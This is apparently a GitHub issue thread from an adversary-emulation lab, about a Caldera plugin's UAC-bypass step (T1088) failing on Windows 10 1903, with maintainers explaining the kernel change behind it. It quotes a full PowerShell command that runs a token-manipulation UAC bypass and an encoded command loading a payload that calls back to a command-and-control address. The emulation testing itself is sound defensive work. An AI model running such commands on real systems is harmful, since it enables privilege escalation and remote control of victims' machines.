[Plugin - Phase 9 - 3.A.1] Bypass User Account Control (T1088)
Cyb3rWard0g opened this issue Β· comments
Good evening,
First, I wanted to say thank you for all your work on this plugin! π
Im running the APT3 Round1 Day1 scenario in The Shire Mordor Environment, and I got Caldera setup and ready to run the plugin.
Victim: IT001.shire.com
IP: 172.18.39.105
User: pgustavo
I ran sandcat via powershell as shown below
I also had two processes running as administrator (right click on cmd and powershell and ran them as Administrators)
I started the operation:
And everything was going well until i got to Phase 9 - 3.A.1
Output:
Import-Module .\Invoke-BypassUACTokenManipulation.ps1 -Verbose -Force;Move-Item -Path .\update.ps1 -Destination $env:APPDATA -Force;$pcode = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("Import-Module $env:APPDATA\update.ps1;update('http://172.18.39.8:8888')"));Invoke-BypassUACTokenManipulation -Arguments "-nop -exec bypass -EncodedCommand $pcode" -Verbose
VERBOSE: Loading module from path 'C:\Users\pgustavo\Invoke-BypassUACTokenManipulation.ps1'.
VERBOSE: Dot-sourcing the script file 'C:\Users\pgustavo\Invoke-BypassUACTokenManipulation.ps1'.
VERBOSE: Enumerating Process list...
VERBOSE: HI Proc found. ID: 3356 684 7440 2668 7724
VERBOSE: [*] Successfully acquired cmd conhost conhost ctfmon powershell handle
VERBOSE: [*] Opened process token
VERBOSE: [*] Duplicated process token
True
VERBOSE: [*] Lowered token mandatory IL
VERBOSE: [*] Created restricted token
VERBOSE: [*] Duplicated restricted token
Requested registry access is not allowed.
Is there anything I can do to troubleshoot this error? I don't have much experience with that script, so I am not sure if it is something I need to do to my box setup to get it to work.
Thank you in advance!
update:
- Round1 day1 was done on a Windows 1803
- The Windows workstations in my environment are 1903
Hello @Cyb3rWard0g,
Unfortunately I was unable to replicate this issue with the Bypass User Account Control ability. Do you have an EDR tool on the endpoints that could be blocking the script from running or blocking the registry that the script is attempting to access?
Hey @scottctaylor12 , thank you for taking a look at it. I do not have anything but defender, but it is disabled. The environment that I use is the following (all well documented) : https://github.com/hunters-forge/Blacksmith/tree/master/aws/mordor/cfn-files/scripts/default . I also worked with Daniel Weiss on this, and he also had the same problems and he is the one that determined that it works on Windows 1803 but not on 1903. One article that talks about this is the following: https://tyranidslair.blogspot.com/2018/10/ . Let me know if this helps? Let me also ask Daniel if he could provide some more details on it.
Bypassing user account control via token manipulation works in Windows 10 v1803, which was used in Round 1 of the evaluations (https://attackevals.mitre.org/methodology/round1/environment.html).
A few posts discuss that with the release of Windows 10 v1809 (RS5 - 17686), bypassing user account control via token manipulation does not work as Windows implemented a change to the kernel by adding an additional access token check (SeTokenCanImpersonate). @Cyb3rWard0g and myself confirmed that it does not work in Windows 10 v1903 which is what the Shire Mordor environment uses.
https://tyranidslair.blogspot.com/2018/10/
https://medium.com/@z3roTrust/bypassing-windows-user-account-control-back-for-more-dd5672c48600
https://twitter.com/tiraniddo/status/1006558397322407936
Our fork added an OS build version check to this step (https://github.com/d4weiss/evals_caldera/blob/master/data/abilities/privilege-escalation/1345bff7-6f26-43b2-a92a-9aabccdb3db0.yml).
The Shire Mordor environment, which uses Windows 10 v1903, sets the UAC level to never notify (https://github.com/hunters-forge/Blacksmith/blob/master/aws/mordor/cfn-files/scripts/default/Prepare-Box.ps1#L69-L71). This is as a temporary work around, allowing the evals_caldera plugin to successfully continue execution after that step.